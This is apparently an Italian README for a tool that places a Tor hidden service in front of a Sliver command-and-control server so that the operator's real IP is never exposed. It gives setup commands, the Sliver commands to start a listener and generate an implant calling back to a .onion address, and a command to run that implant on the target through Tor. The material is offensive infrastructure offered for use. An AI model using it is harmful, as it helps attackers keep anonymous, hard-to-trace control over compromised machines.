
Ponte di trasporto Tor per Sliver C2 - comando e controllo anonimo
ponte di trasporto basato su tor per sliver c2. crea un servizio nascosto e inoltra il traffico al tuo server sliver in modo che il tuo vero IP non sia mai esposto.
Configura un servizio nascosto tor che punta a un proxy HTTP locale. Il proxy inoltra tutto al listener HTTPS di sliver. Gli impianti si connettono tramite tor, tu li controlli normalmente con sliver.
server sliver <---> proxy <---> servizio nascosto tor <---> impianto
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
Avvia sliver con un listener HTTPS:
sliver-client
sliver > https -L 127.0.0.1 -l 8443
In un altro terminale, avvia il ponte:
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
L'output mostrerà qualcosa come:
[+] Tor avviato con successo!
[+] Servizio nascosto: http://abc123xyz.onion
[+] Ponte PRONTO!
Attendi l'indirizzo .onion, poi genera un impianto:
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/impianto
Esegui l'impianto sul target (necessita di tor):
HTTP_PROXY=socks5h://127.0.0.1:9050 ./impianto
sliver-tor-bridge start [OPZIONI]
--sliver-port porta HTTPS di sliver (default 8443)
--tor-port porta socks di tor (default 9050)
--service-port porta del servizio nascosto (default 80)
-c, --config percorso del file di configurazione
Altri comandi:
sliver-tor-bridge status # controlla se il servizio nascosto è in esecuzione
sliver-tor-bridge stop # pulisce la directory del servizio nascosto
graph LR
Impianto[Impianto] -->|Rete Tor| HS["Servizio nascosto (.onion)"]
HS -->|TCP :8080| Proxy["Proxy del ponte"]
Proxy -->|HTTPS :8443| Sliver["Server Sliver"]
Il ponte si trova in mezzo e inoltra il traffico. Sliver pensa di ricevere normali connessioni HTTPS. L'impianto pensa di parlare con un normale server HTTP.
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # interfaccia a riga di comando
tor_manager.py # avvia tor e crea il servizio nascosto
proxy.py # app Flask che inoltra a sliver
config.py # gestione della configurazione
tor non si avvia: assicurati che il tor di sistema sia fermo (sudo systemctl stop tor)
timeout di connessione: il bootstrap di tor può richiedere 1-3 minuti, attendi il 100%
l'impianto non si connette: assicurati che l'impianto abbia accesso a tor (proxy socks sulla 9050)
mit